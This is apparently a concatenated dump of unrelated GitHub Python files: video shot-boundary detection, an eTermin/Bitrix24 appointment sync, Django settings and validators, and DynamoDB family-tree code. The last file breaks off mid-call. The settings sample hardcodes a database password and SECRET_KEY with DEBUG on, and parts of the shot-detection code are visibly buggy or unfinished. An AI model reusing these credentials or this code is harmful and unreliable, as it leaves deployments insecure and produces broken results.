edge_pattern = get_block_edge_pattern(block)\n\n q_prime_value = np.where(edge_pattern == 1)[0].shape[0]\n\n return q_prime_value\n\ndef lower_mean(block):\n \"\"\"\n Computes the lower mean for a single block in a grayscale image\n\n Parameters\n ----------\n block: array of shape (N, )\n A single block that exists in the grayscale image\n \n Returns\n -------\n lower_mean: float\n The lower mean for the block\n \"\"\"\n\n mean = block_mean(block)\n q = get_q_value(block)\n summation_indices = np.where(block < mean)[0]\n summation = np.sum(block[summation_indices])\n\n lower_mean = (1 / (16 - q)) * summation \n\n return lower_mean \n\ndef higher_mean(block):\n \"\"\"\n Computes the higher mean for a single block in a grayscale image\n\n Parameters\n ----------\n block: array of shape (N, )\n A single block that exists in the grayscale image\n \n Returns\n -------\n higher_mean: float\n The higher mean for the block\n \"\"\"\n\n mean = block_mean(block)\n q = get_q_value(block)\n summation_indices = np.where(block >= mean)[0]\n summation = np.sum(block[summation_indices])\n\n higher_mean = (1 / q) * summation\n\n return higher_mean\n\ndef is_edge_block(edge_pattern):\n \"\"\"\n Determines whether a block is an edge or nonedge block\n\n Parameters\n ----------\n edge_pattern: array of shape (N, )\n The edge pattern for a block\n\n Returns\n -------\n is_edge_block: boolean\n\n Notes\n -------\n 8 is used because the frames we are using can be split perfectly; therefore, each block will contain 16 pixels.\n If over 8 pixels are a 1, then it is an edge block\n \"\"\"\n num_edge_pixels = np.nonzero(edge_pattern)[0].shape[0]\n \n is_edge_block = num_edge_pixels > 8\n \n return is_edge_block\n\n\n###########################\n# 3.2 Similarity Measures #\n###########################\n\ndef diff_both_edge_blocks(block_1, block_2):\n \"\"\"\n Computes the difference between two edge blocks\n pass\n \"\"\"\n # Get block means\n m1 = block_mean(block_1)\n m2 = block_mean(block_2)\n # Get q values for each block\n q1 = get_q_value(block_1)\n q2 = get_q_value(block_2)\n # Get lower_mean for each block\n lm1 = lower_mean(block_1)\n lm2 = lower_mean(block_2)\n # Get higher_mean for each block\n hm1 = higher_mean(block_1)\n hm2 = higher_mean(block_2)\n\n # \"t\" stands for term\n t1 = np.abs((q1 - q2) * (hm1 - hm2))\n t2 = np.abs(lm1 - lm2) + np.abs(hm1 - hm2)\n \n diff = t1 * t2\n\n return diff\n\n\ndef diff_both_nonedge_blocks(block_1, block_2):\n \"\"\"\n Computes the difference between two nonedge blocks\n \"\"\"\n # Get block means\n m1 = block_mean(block_1)\n m2 = block_mean(block_2)\n # Get q values for each block\n q1 = get_q_prime_value(block_1)\n q2 = get_q_prime_value(block_2)\n\n # \"t\" stands for term\n t1 = np.abs(q1 - q2)\n t2 = np.abs(m1 - m2)\n\n diff = 2 * t1 * t2 \n\n return diff\n\ndef diff_edge_nonedge(block_1, block_2):\n \"\"\"\n Computes the difference between an edge block and a non-edge block\n\n Parameters\n ----------\n block_1: array of type uint8 and shape (N, )\n the edge block\n block_2: array of shape (N, )\n the non-edge block\n\n Returns\n -------\n diff: float\n a similarity measure\n \"\"\"\n # Get the non-edge block mean\n m2 = block_mean(block_2)\n # Get q value for block 1 and q prime value for block 2\n q1 = get_q_value(block_1)\n q2 = get_q_prime_value(block_2)\n # Get lower and higher mean for block 1\n lm1 = lower_mean(block_1)\n hm1 = higher_mean(block_1)\n\n # \"t\" stands for term\n t1 = np.abs(q1 - q2)\n t2 = np.abs(lm1 + hm1 - (2 * m2))\n\n diff = t1 * t2 \n\n return diff\n\ndef diff_nonedge_edge(block_1, block_2):\n \"\"\"\n Computes the difference between an edge block and a non-edge block\n\n Parameters\n ----------\n block_1: array of type uint8 and shape (N, )\n the non-edge block\n block_2: array of shape (N, )\n the edge block\n\n Returns\n -------\n diff: float\n a similarity measure\n \"\"\"\n # Get mean of non-edge block\n m1 = block_mean(block_1)\n # Get q values\n q1 = get_q_prime_value(block_1)\n q2 = get_q_value(block_2)\n # Get lower and higher mean for block 2\n lm2 = lower_mean(block_2)\n hm2 = higher_mean(block_2)\n\n # \"t\" stands for term\n t1 = np.abs(q1 - q2)\n t2 = np.abs((2 * m1) - (lm2 + hm2))\n\n diff = t1 * t2\n\n return diff\n\ndef frame_blocks_perfect(frame_1, frame_2):\n \"\"\"\n Splits each frame into (4 x 4) blocks. Each dimension for each frame must be perfectly divisible by 4.\n \"\"\"\n # Both frames will have same shape\n rows, cols = frame_1.shape\n\n if rows < 4 or cols < 4:\n raise ValueError(\"Frame must have a larger shape than (4, 4)\")\n\n num_blocks_down = int(rows / 4)\n num_blocks_across = int(cols / 4)\n\n # This array's shape[0] should be divisible by 4 with remainder 0\n perfect_blocks_1 = np.zeros(shape=(1, 4))\n perfect_blocks_2 = np.zeros(shape=(1, 4))\n # Split array into groups of 4 rows\n lower_row = 0\n higher_row = 4\n step = 4\n # make sure to delete the first row of zeros after loop\n while higher_row <= rows:\n row_group_1 = frame_1[np.arange(lower_row, higher_row),:]\n row_group_2 = frame_2[np.arange(lower_row, higher_row),:]\n lower_col = 0\n higher_col = 4\n while higher_col <= cols:\n block_1 = row_group_1[:,np.arange(lower_col, higher_col)]\n block_2 = row_group_2[:,np.arange(lower_col, higher_col)]\n perfect_blocks_1 = np.vstack((perfect_blocks_1, block_1))\n perfect_blocks_2 = np.vstack((perfect_blocks_2, block_2))\n lower_col += step\n higher_col += step\n lower_row += step\n higher_row += step\n \n # Delete the leading zeros placeholder\n perfect_blocks_1 = np.delete(perfect_blocks_1, 0, axis=0)\n perfect_blocks_2 = np.delete(perfect_blocks_2, 0, axis=0)\n\n return perfect_blocks_1, perfect_blocks_2\n\n\ndef frame_blocks_extra(frame_1, frame_2):\n \"\"\"\n Splits each frame into (4 x 4) blocks\n\n Notes\n ------\n If there were extra rows, then I considered all cols and made\n blocks of size num_extra_rows x 4. If there were any remaining columns, I discarded them.\n If there were extra cols, then I considered all rows up to, but not including, the start of\n the extra rows and made blocks of size 4 x num_extra_cols. \n\n I split the frame into 3 regions to handle frames whose size is not perfectly divisble by 16 (4 x 4)\n \"\"\"\n # Both frames will have same shape\n rows, cols = frame_1.shape\n\n if rows < 4 or cols < 4:\n raise ValueError(\"Frame must have a larger shape than (4, 4)\")\n \n num_blocks_across = int(cols / 4)\n extra_width = cols % 4\n\n num_blocks_down = int(rows / 4)\n extra_height = rows % 4\n # There should be num_blocks_across * num_blocks_down perfect blocks. The vars above are for testing\n\n # Consider all blocks that fit perfectly first (Region 1)\n # This array's shape[0] should be divisible by 4 with remainder 0\n perfect_blocks_1 = np.zeros(shape=(1, 4))\n perfect_blocks_2 = np.zeros(shape=(1, 4))\n # Split array into groups of 4 rows\n lower_row = 0\n higher_row = 4\n step = 4\n # make sure to delete the first row of zeros after loop\n while higher_row <= rows:\n row_group_1 = frame_1[np.arange(lower_row, higher_row),:]\n row_group_2 = frame_2[np.arange(lower_row, higher_row),:]\n lower_col = 0\n higher_col = 4\n while higher_col <= cols:\n block_1 = row_group_1[:,np.arange(lower_col, higher_col)]\n block_2 = row_group_2[:,np.arange(lower_col, higher_col)]\n perfect_blocks_1 = np.vstack((perfect_blocks_1, block_1))\n perfect_blocks_2 = np.vstack((perfect_blocks_2, block_2))\n lower_col += step\n higher_col += step\n lower_row += step\n higher_row += step\n \n # Delete the leading zeros placeholder\n perfect_blocks_1 = np.delete(perfect_blocks, 0, axis=0)\n perfect_blocks_2 = np.delete(perfect_blocks, 0, axis=0)\n\n # Get the blocks of the extra rows (Region 2)\n start_index = higher_row - step\n extra_row_blocks_1 = None\n extra_row_blocks_2 = None\n lower_col = 0\n higher_col = 4\n if start_index < rows:\n extra_row_blocks_1 = np.zeros(shape=(rows - start_index, 4))\n extra_row_blocks_2 = np.zeros(shape=(rows - start_index, 4))\n extra_rows_group_1 = np.delete(frame_1, np.arange(0, start_index), axis=0)\n extra_rows_group_2 = np.delete(frame_2, np.arange(0, start_index), axis=0)\n while higher_col <= cols:\n block_1 = extra_rows_group_1[:,np.arange(lower_col, higher_col)]\n block_2 = extra_rows_group_2[:,np.arange(lower_col, higher_col)]\n extra_rows_blocks_1 = np.vstack((extra_rows_blocks_1, block_1))\n extra_rows_blocks_2 = np.vstack((extra_rows_blocks_2, block_2))\n lower_col += step \n higher_col += step\n \n # Delete the leading zeros placeholders\n extra_row_blocks_1 = np.delete(extra_row_blocks_1, 0, axis=0)\n extra_row_blocks_2 = np.delete(extra_row_blocks_2, 0, axis=0)\n\n # Get the blocks of the extra columsn (Region 3)\n start_index = higher_col - step\n extra_cols_blocks_1 = None \n extra_cols_blocks_2 = None\n if start_index < cols:\n extra_cols_blocks_1 = np.zeros(shape=(4, cols - start_index))\n extra_cols_blocks_2 = np.zeros(shape=(4, cols - start_index))\n extra_cols_group_1 = np.delete(frame_1, np.arange(0, start_index), axis=1)\n extra_cols_group_2 = np.delete(frame_2, np.arange(0, start_index), axis=1)\n lower_row = 0\n higher_row = 4\n while higher_row <= rows:\n block_1 = extra_cols_group_1[np.arange(lower_row, higher_row),:]\n block_2 = extra_cols_group_2[np.arange(lower_row, higher_row),:]\n extra_cols_blocks_1 = np.vstack((extra_cols_blocks_1, block_1))\n extra_cols_blocks_2 = np.vstack((extra_cols_blocks_2, block_2))\n\n # Delete the leading zeros placeholders\n extra_row_blocks_1 = np.delete(extra_row_blocks_1, 0, axis=0)\n extra_row_blocks_2 = np.delete(extra_row_blocks_2, 0, axis=0)\n\n return perfect_blocks_1, perfect_blocks_2, extra_rows_blocks_1, extra_rows_blocks_2, extra_cols_blocks_1, extra_cols_blocks_2\n\ndef get_diff_values(frame1, frame2):\n \"\"\"\n Gets the difference/continuity value for all corresponding blocks between 2 consecutive frames\n\n Returns\n ---------\n diff_values: array of type float and shape (N, )\n All difference values between corresponding blocks of 2 consecutive frames\n\n Notes\n -------\n Should return an array of shape(14400, ) for the frames we are using. \n We should expect a lot of zeros in this array since consecutive frames are likely to be similar.\n \"\"\"\n diff_values = np.array([])\n # pb1 and pb2 have shape (N, 4) where N is the total number of pixels divided by 4 \n pb1, pb2 = frame_blocks_perfect(frame1, frame2)\n start = 0\n step = 4\n while start < pb1.shape[0]:\n # will be a 4 x 4 block so must reshape to (16, )\n diff_value = None\n upper = start + step\n block_1 = pb1[range(start, upper),:].reshape(-1)\n block_2 = pb2[range(start, upper),:].reshape(-1)\n ep1 = get_block_edge_pattern(block_1)\n ep2 = get_block_edge_pattern(block_2)\n b1_is_edge = is_edge_block(ep1)\n b2_is_edge = is_edge_block(ep2)\n if b1_is_edge and b2_is_edge:\n diff_value = diff_both_edge_blocks(block_1, block_2)\n elif b1_is_edge and (not b2_is_edge):\n diff_value = diff_edge_nonedge(block_1, block_2)\n elif b2_is_edge and (not b1_is_edge):\n diff_value = diff_nonedge_edge(block_1, block_2)\n else:\n diff_value = diff_both_nonedge_blocks(block_2, block_2)\n # Append diff value to array of diff values\n diff_values = np.hstack((diff_values, diff_value))\n # Increment start by 4 to consider next pair of corresponding blocks\n start += 4\n\n return diff_values\n \n\ndef frame_continuity_value(diff_values):\n \"\"\"\n Computes the continuity value which represents ALL corresponding blocks in consecutive frames\n\n Parameters\n ----------\n diff_values: Array of shape (N, )\n The array that contains all the corresponding difference/similarity scores between 2 consecutive frames\n \n Returns\n -------\n continuity_value: float\n The continuity value between 2 consecutive frames\n \"\"\"\n return np.sum(diff_values)\n\ndef full_sequence_diff_vals(frame_dir):\n \"\"\"\n Computes the difference/continuity values between ALL consecutive frames in the video\n \"\"\"\n frame_names = listdir(frame_dir)\n full_sequence_diffs = np.array([])\n for i in range(len(frame_name) - 1):\n f1_name = frame_names[i]\n f2_name = frame_names[i + 1]\n f1 = np.load(join(frame_dir, f1_name))\n f2 = np.load(join(frame_dir, f2_name))\n f1_gray = rgb2gray(f1)\n f2_gray = rgb2gray(f2)\n diff_values = get_diff_values(f1_gray, f2_gray)\n cont_val = frame_continuity_value(diff_values)\n full_sequence_diffs = np.hstack((full_sequence_diffs, cont_val))\n \n return full_sequence_diffs\n\n \n###########################\n# 3.3 Least Squares #\n###########################\n\ndef least_squared_error(diff_values):\n g = diff_values * np.transpose(diff_values)\n m = np.zeros((2, len(diff_values)))\n m[:0] = diff_values\n m[:1] = diff_values\n\n m_zero = np.zeros((2, 2))\n\n h_0 = np.concatenate((g, np.transpose(m)), axis=1)\n h_1 = np.concatenate((m, m_zero), axis=1)\n h = np.concatenate((h_0, h_1), axis=0)\n\n b = h * diff_values\n\n f = None\n total = 0\n for i in range(1, len(diff_values) + 1):\n f = b[m + len(diff_values)]\n total += np.sum(diff_values)\n\n###########################\n# 3.4 Shot Frame Clustering#\n###########################\n\ndef shot_frame_clustering(diff_values):\n \"\"\"\n diff_values here is for the entire sequence of frames. has shape (N-1, ) where N is total number of frames\n \"\"\"\n delta = 5\n d = 1\n i = 1\n clusters = []\n clusters.append([diff_values[0]])\n i += 1\n cont_val = frame_continuity_value(diff_values)\n while i < len(diff_values):\n if diff_values[i] < 5:\n clusters[d] = np.append(clusters[d], i)\n elif len(clusters[d]) == 1:\n clusters[d - 1] = np.append(clusters[d - 1], i)\n elif len(clusters[d]) > 1 and len(clusters[d]) < 5:\n l = clusters[d - i][len(clusters[d - 1]) - 1]\n f = clusters[d][0]\n s = clusters[d][1]\n\n if (diff_values[f] - diff_values[l]) - (diff_values[f] - diff_values[s]) < 0.5*delta:\n clusters[d - 1] = np.append(clusters[d], clusters[d - 1])\n clusters[d - 1] = np.flatten(clusters[d - 1])\n clusters[d] = np.delete(clusters, d)\n else:\n d += 1\n i += 1\n \n return clusters\n \n\n\n\n\n","repo_name":"bzhulex/CV_Project","sub_path":"keyframe_extractors/edge_aware_clustering/shot_boundary_detection.py","file_name":"shot_boundary_detection.py","file_ext":"py","file_size_in_byte":18365,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"71099021492","text":"from operator import index\nimport base64\nimport re\nimport time\nimport json\nimport random\nimport pytz\nfrom datetime import datetime, timedelta\nimport dateutil.parser\n\nfrom app import db\nfrom app.modules.user import auto_assign_lead_to_user\nfrom app.modules.external.bitrix24.company import add_company\nfrom app.modules.external.bitrix24.contact import get_contact_by_email, add_contact\nfrom app.modules.external.bitrix24.deal import get_deals, add_deal\nfrom app.modules.external.bitrix24.task import get_tasks, update_task, get_task\nfrom app.modules.external.bitrix24.timeline_comment import add_timeline_comment\nfrom app.modules.external.mfr.task import get_linked_data_by_task\nfrom app.modules.settings import get_settings, set_settings\nfrom app.utils.error_handler import error_handler\nfrom app.utils.data_convert import street_to_street_with_nb, internationalize_phonenumber\n\nfrom ._connector import get, post, put\n\n\ndef import_new_appointments():\n print(\"import etermin\")\n config = get_settings(section=\"external/etermin\")\n syncToken = 1\n if \"SyncToken\" in config:\n syncToken = config[\"SyncToken\"]\n response = get(\"/api/appointmentsync\", parameters={\"synctoken\": syncToken})\n if response is not None and \"SyncToken\" in response:\n for appointment in response[\"data\"]:\n if appointment.get('SelectedAnswers') in [None, \"\"]:\n continue\n existing_deals = get_deals({\"filter[=UF_CRM_1614177772351]\": appointment['ID']}, force_reload=True)\n if len(existing_deals) == 0:\n contact = get_contact_by_email(appointment[\"Email\"])\n deal_data = {\n \"stage_id\": \"C134:NEW\",\n \"category_id\": \"134\"\n }\n startDatetime = dateutil.parser.parse(appointment['StartDateTime'])\n endDatetime = dateutil.parser.parse(appointment['EndDateTime'])\n if contact is None:\n deal_data[\"firstname\"] = appointment[\"FirstName\"]\n deal_data[\"lastname\"] = appointment[\"LastName\"]\n deal_data[\"street\"] = appointment[\"Street\"]\n deal_data[\"zip\"] = appointment[\"ZIP\"]\n deal_data[\"city\"] = appointment[\"Town\"]\n deal_data[\"email\"] = appointment[\"Email\"]\n deal_data[\"phone\"] = appointment[\"Phone\"]\n deal_data[\"title\"] = f\"{appointment['LastName']} {appointment['FirstName']} {appointment['Town']} am {startDatetime.strftime('%d.%m.%Y')}\"\n else:\n deal_data[\"contact_id\"] = contact[\"id\"]\n deal_data[\"title\"] = f\"{contact['last_name']} {contact['first_name']} {contact['city']} am {startDatetime.strftime('%d.%m.%Y')}\"\n deal_data[\"service_appointment_notes\"] = f\"Wartungstermin für den {startDatetime.strftime('%d.%m.%Y %H:%M:%S')} bis {endDatetime.strftime('%d.%m.%Y %H:%M:%S')} // eTermin\"\n deal_data[\"service_appointment_date\"] = startDatetime.strftime('%d.%m.%Y')\n deal_data[\"service_appointment_startdate\"] = pytz.timezone(\"Europe/Berlin\").localize(startDatetime).isoformat()\n deal_data[\"service_appointment_enddate\"] = pytz.timezone(\"Europe/Berlin\").localize(endDatetime).isoformat()\n deal_data[\"etermin_id\"] = f\"{appointment['ID']}\"\n deal_data[\"comments\"] = f\"Name: {appointment['FirstName']} {appointment['LastName']}
\\nE-Mail: {appointment['Email']}
\\n\"\n deal_data[\"comments\"] = f\"{deal_data['comments']}Gebucht am: {appointment['BookingDate']}
\\nOrt: {appointment['Location']}
\\nThema: {appointment['SelectedAnswers']}
\\nKommentar: {appointment['Notes']}\"\n if appointment['SelectedAnswers'] == \"PV Anlage ohne Speicher\":\n deal_data[\"mfr_category\"] = \"service\"\n if appointment['SelectedAnswers'] == \"PV Anlage mit Lithiumspeicher\":\n deal_data[\"mfr_category\"] = \"service_pv_storage_li\"\n if appointment['SelectedAnswers'] == \"PV Anlage mit Bleispeicher\":\n deal_data[\"mfr_category\"] = \"service_pv_storage_pb\"\n if appointment['SelectedAnswers'] == \"Lithiumspeicher ohne Photovoltaik-Anlage\":\n deal_data[\"mfr_category\"] = \"service_storage_li\"\n if appointment['SelectedAnswers'] == \"Bleispeicher ohne Photovoltaik-Anlage\":\n deal_data[\"mfr_category\"] = \"service_storage_pb\"\n print(\"add deal\", add_deal(deal_data))\n config = get_settings(\"external/etermin\")\n if config is not None:\n config[\"SyncToken\"] = response[\"SyncToken\"]\n set_settings(\"external/etermin\", config)\n\n\ndef export_appointments():\n config = get_settings(\"external/etermin\")\n print(\"export task etermin\")\n if config is None:\n print(\"no config for export task etermin\")\n return None\n last_task_export_time = config.get(\"last_task_export_time\", \"2021-01-01\")\n tasks = get_tasks({\n \"select[0]\": \"TITLE\",\n \"select[1]\": \"DESCRIPTION\",\n \"select[2]\": \"UF_CRM_TASK\",\n \"select[3]\": \"CONTACT_ID\",\n \"select[4]\": \"COMPANY_ID\",\n \"select[5]\": \"TIME_ESTIMATE\",\n \"select[6]\": \"UF_AUTO_422491195439\",\n \"select[7]\": \"STATUS\",\n \"select[8]\": \"START_DATE_PLAN\",\n \"select[9]\": \"END_DATE_PLAN\",\n \"select[10]\": \"RESPONSIBLE_ID\",\n \"select[11]\": \"ACCOMPLICES\",\n \"select[12]\": \"SUBORDINATE\",\n \"select[13]\": \"AUDITORS\",\n \"select[14]\": \"DEADLINE\",\n \"select[15]\": \"UF_AUTO_219922666303\",\n \"select[16]\": \"UF_AUTO_343721853755\",\n \"select[17]\": \"UF_AUTO_513701476131\",\n \"filter[>CHANGED_DATE]\": last_task_export_time,\n \"filter[TITLE]\": \"%[mfr]%\"\n }, force_reload=True)\n last_task_export_time = datetime.now()\n if tasks is None:\n return\n for task in tasks:\n export_appointment(task)\n config = get_settings(\"external/etermin\")\n if config is not None:\n config[\"last_task_export_time\"] = last_task_export_time.astimezone().isoformat()\n set_settings(\"external/etermin\", config)\n\n\ndef export_appointment(task):\n print(\"export task \", task.get(\"id\"))\n if task.get(\"startDatePlan\") in [None, \"\", \"0\"]:\n print(\"no start date\")\n return\n if task.get(\"mfr_appointments\") in [0, \"\", None]:\n print(\"no mfr_appointments\")\n return\n if task.get(\"mfr_appointments\")[:1] in [\"{\", \"[\"]:\n appointments = json.loads(task.get(\"mfr_appointments\"))\n else:\n appointments = json.loads(base64.b64decode(task.get(\"mfr_appointments\").encode('utf-8')).decode('utf-8'))\n if task.get(\"etermin_appointments\") not in [0, \"\", None]:\n if task.get(\"etermin_appointments\")[:1] in [\"{\", \"[\"]:\n old_etermin_appointments = json.loads(task.get(\"etermin_appointments\"))\n else:\n old_etermin_appointments = json.loads(base64.b64decode(task.get(\"etermin_appointments\").encode('utf-8')).decode('utf-8'))\n else:\n old_etermin_appointments = []\n etermin_appointments = []\n i = 0\n for appointment in appointments:\n etermin_appointment = {\n \"start\": appointment.get(\"StartDateTime\"),\n \"end\": appointment.get(\"EndDateTime\"),\n \"bitrix_user_ids\": appointment.get(\"bitrix_user_ids\")\n }\n if i < len(old_etermin_appointments):\n if \"etermin_id\" in old_etermin_appointments[i]:\n etermin_appointment[\"etermin_id\"] = old_etermin_appointments[i][\"etermin_id\"]\n if i == 0:\n etermin_appointment[\"etermin_id\"] = task.get(\"etermin_id\")\n etermin_appointments.append(etermin_appointment)\n i = i + 1\n i = 0\n if json.dumps(old_etermin_appointments) != json.dumps(etermin_appointments) and len(etermin_appointments) > 0:\n for etermin_appointment in etermin_appointments:\n start_datetime = dateutil.parser.parse(etermin_appointment[\"start\"]).strftime(\"%Y-%m-%d %H:%M:%S\")\n end_datetime = dateutil.parser.parse(etermin_appointment[\"end\"]).strftime(\"%Y-%m-%d %H:%M:%S\")\n if etermin_appointment.get(\"etermin_id\") not in [None, \"\", \"0\"]:\n post_data = {\n \"id\": etermin_appointment.get(\"etermin_id\"),\n \"start\": start_datetime,\n \"end\": end_datetime\n }\n print(\"export task update etermin\", task[\"id\"])\n response = put(\"/api/appointment\", post_data=post_data)\n if response.get(\"status\", \"\") != \"success\":\n print(\"etermin-error:\", response)\n else:\n if \"90\" not in etermin_appointment.get(\"bitrix_user_ids\"):\n continue\n deal_data, contact_data, company_data = get_linked_data_by_task(task)\n if deal_data is not None and deal_data.get(\"etermin_id\") not in [None, \"\", \"0\"]:\n continue\n if deal_data is None and contact_data is None:\n continue\n post_data = {\n \"start\": start_datetime,\n \"end\": end_datetime,\n \"calendarid\": 93100,\n \"sendemail\": False\n }\n if company_data is not None:\n post_data[\"street\"] = company_data[\"street\"]\n post_data[\"zip\"] = company_data[\"zip\"]\n post_data[\"city\"] = company_data[\"city\"]\n if contact_data is not None:\n post_data[\"firstname\"] = contact_data[\"first_name\"]\n post_data[\"lastname\"] = contact_data[\"last_name\"]\n post_data[\"street\"] = contact_data[\"street\"]\n post_data[\"zip\"] = contact_data[\"zip\"]\n post_data[\"city\"] = contact_data[\"city\"]\n post_data[\"location\"] = f'{post_data[\"street\"]}, {post_data[\"zip\"]} {post_data[\"city\"]}'\n print(\"export task etermin\", task[\"id\"])\n response = post(\"/api/appointment\", post_data=post_data)\n if response is not None and \"cid\" in response:\n etermin_appointment[\"etermin_id\"] = response[\"cid\"]\n else:\n print(\"post_data:\", post_data)\n print(\"etermin-error:\", response)\n update_task(task[\"id\"], {\n \"etermin_id\": etermin_appointments[0][\"etermin_id\"],\n \"etermin_appointments\": base64.b64encode(json.dumps(etermin_appointments).encode('utf-8')).decode('utf-8')\n })\n","repo_name":"vrcompugo/EV-Manager-Data-API","sub_path":"app/modules/external/etermin/appointment.py","file_name":"appointment.py","file_ext":"py","file_size_in_byte":10695,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"15732492207","text":"from rest_framework import serializers\nfrom .models import Order\n\nclass OrderSerializer(serializers.ModelSerializer):\n class Meta:\n model = Order\n fields = [\n 'order_id', \n 'car_name', \n 'car_brand', \n 'car_model', \n 'service_name', \n 'service_cost',\n 'add_ons',\n 'is_done',\n 'total_cost',\n 'created_by',\n 'created_at',\n 'updated_at',\n 'assigned_to',\n 'booked_for_date'\n ]\n","repo_name":"gawdeparag/gcw_backend","sub_path":"gcw_order/order/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":555,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"72299453814","text":"# Django settings for postfixadmin project.\n\nimport os.path\n\nROOT_PATH = os.path.dirname(os.path.abspath(__file__))\nJOIN = os.path.join\n\nDEBUG = True\nTEMPLATE_DEBUG = DEBUG\n\nADMINS = (\n ('Claudio Borges', 'cbsfilho@gmail.com'),\n)\n\nMANAGERS = ADMINS\n\nDATABASE_ENGINE = 'mysql'\nDATABASE_NAME = 'postfix'\nDATABASE_USER = 'postfix'\nDATABASE_PASSWORD = 'Eir3so0kae1Ae'\nDATABASE_HOST = 'localhost'\nDATABASE_PORT = '3306'\n\nTIME_ZONE = 'America/Sao_Paulo'\n\nLANGUAGE_CODE = 'en-us'\n\nSITE_ID = 1\n\nUSE_I18N = True\n\nUSE_L10N = True\n\nMEDIA_ROOT = '/usr/share/pyshared/django/contrib/admin/media/'\n\nMEDIA_URL = '/media/'\n\nADMIN_MEDIA_PREFIX = '/media/'\n\nSECRET_KEY = '&+x4&8&wqicd$0)$ssjq1$x)=d!x9(n)q4*jn231&cyyz@outi'\n\nTEMPLATE_LOADERS = (\n 'django.template.loaders.filesystem.Loader',\n 'django.template.loaders.app_directories.Loader',\n)\n\nMIDDLEWARE_CLASSES = (\n 'django.middleware.common.CommonMiddleware',\n 'django.contrib.sessions.middleware.SessionMiddleware',\n 'django.middleware.csrf.CsrfViewMiddleware',\n 'django.contrib.auth.middleware.AuthenticationMiddleware',\n 'django.contrib.messages.middleware.MessageMiddleware',\n)\n\nROOT_URLCONF = 'postfixadmin.urls'\n\nTEMPLATE_DIRS = (\n JOIN(ROOT_PATH, 'templates')\n)\n\nINSTALLED_APPS = (\n 'django.contrib.auth',\n 'django.contrib.contenttypes',\n 'django.contrib.sessions',\n 'django.contrib.sites',\n 'django.contrib.messages',\n 'django.contrib.admin',\n\n # Postfixadmin extensions\n 'postfixadmin.aliases',\n 'postfixadmin.domains',\n 'postfixadmin.users',\n 'postfixadmin.autoresponse'\n)\n","repo_name":"linkedinyou/postfixadmin-1","sub_path":"settings_sample.py","file_name":"settings_sample.py","file_ext":"py","file_size_in_byte":1580,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"16578602117","text":"import re\n\nfrom django.core.exceptions import ValidationError\nfrom django.core.validators import validate_email as validate_plain_email, EmailValidator\nfrom django.template import Template, TemplateSyntaxError\nfrom django.utils.encoding import force_text\n\nfrom .compat import text_type\n\nclass FullEmailValidator(EmailValidator):\n \"\"\" Simple validator that passes for email addresses bearing a display name\n i.e. John Smith \n\n Both \"Recipient Name \" and \"email@example.com\" are valid.\n\n \"\"\"\n def __call__(self, value):\n try:\n res = super(FullEmailValidator, self).__call__(value)\n except ValidationError:\n try:\n split_address = re.match(r'(.+) \\<(.+@.+)\\>', value)\n display_name, email = split_address.groups()\n super(FullEmailValidator, self).__call__(email)\n except AttributeError:\n raise ValidationError(self.message, code=self.code)\n\nvalidate_email_with_name = FullEmailValidator(**dict(validate_plain_email.__dict__))\n\n\ndef validate_comma_separated_emails(value):\n \"\"\"\n Validate every email address in a comma separated list of emails.\n \"\"\"\n if not isinstance(value, (tuple, list)):\n raise ValidationError('Email list must be a list/tuple.')\n\n for email in value:\n try:\n validate_email_with_name(email)\n except ValidationError:\n raise ValidationError('Invalid email: %s' % email, code='invalid')\n\n\ndef validate_template_syntax(source):\n \"\"\"\n Basic Django Template syntax validation. This allows for robuster template\n authoring.\n \"\"\"\n try:\n Template(source)\n except TemplateSyntaxError as err:\n raise ValidationError(text_type(err))\n","repo_name":"LeGast00n/django-post_office","sub_path":"post_office/validators.py","file_name":"validators.py","file_ext":"py","file_size_in_byte":1789,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"21"} +{"seq_id":"13342559017","text":"n = int(input())\r\na= list(map(int, input().split()))\r\nb= [i for i in a if sum([j for j in range(1,i) if i % j ==0 ]) > i]\r\nprint(len(b))\r\nprint(sorted(b))\r\n\r\na = input().split()\r\ndem =0\r\nfor i in range(len(a[1])):\r\n if a[0] == a[1][i:i+2]:\r\n dem +=1\r\nprint(dem)\r\n# \r\nn = int(input())\r\ndem = 0 \r\nb = []\r\na = list(map(int, input().split()))\r\nfor i in a:\r\n for j in range(1,i+1):\r\n if i % j ==0 :\r\n dem +=1\r\n if dem ==3 :\r\n b.append(i)\r\nif len(b) == 0:\r\n print(\"KHÔNG\") \r\nelse:\r\n print(len(b)) \r\n\r\na= list(map(str,input().split()))\r\nn = int(input())\r\nb = list(set(i for i in a[0]))\r\n\r\n\r\n\r\n","repo_name":"HungTien0910/PYTHON_HIT_PRIVATE","sub_path":"ktra.py","file_name":"ktra.py","file_ext":"py","file_size_in_byte":652,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4966033524","text":"import boto3\nfrom boto3.dynamodb.conditions import Key, Attr\nfrom relative import Relative\nfrom relation import Relation\nfrom util import reset_all_tables\nimport unittest\n\ndef get_ddb():\n return boto3.resource('dynamodb', endpoint_url=\"http://localhost:8000\", region_name='us-west-2')\n\n\ndef get_table(table_name):\n return get_ddb().Table(table_name)\n\n\ndef get_relative_table():\n return get_table('relative')\n\n\ndef get_relation_table():\n return get_table('relation')\n\n\n# Assuming no pagination\n# We need GSIs over the name and DOB\ndef get_relative_by_name(name):\n response = get_relative_table().scan(FilterExpression=Attr('name').contains(name))\n items = response['Items']\n if items:\n return [Relative.from_dict(item) for item in items]\n return None\n\n\ndef get_relative_by_id(id):\n response = get_relative_table().get_item(Key={'id': id})\n item = response['Item']\n if item:\n return Relative.from_dict(item)\n return None\n\n\ndef get_relatives(relative_id):\n response = get_relation_table().query(KeyConditionExpression=Key('src').eq(relative_id))\n relatives = {}\n\n # There can be only one direct relation\n # 1. Parent (Biological)\n # 2. Spouse\n for item in response['Items']:\n relatives[item['dest']] = item['relation']\n\n return relatives\n\n\ndef add_relative(relative):\n get_relative_table().put_item(\n Item=relative.asdict(),\n ConditionExpression='attribute_not_exists(id)')\n\n\ndef add_relation(relation):\n get_relation_table().put_item(\n 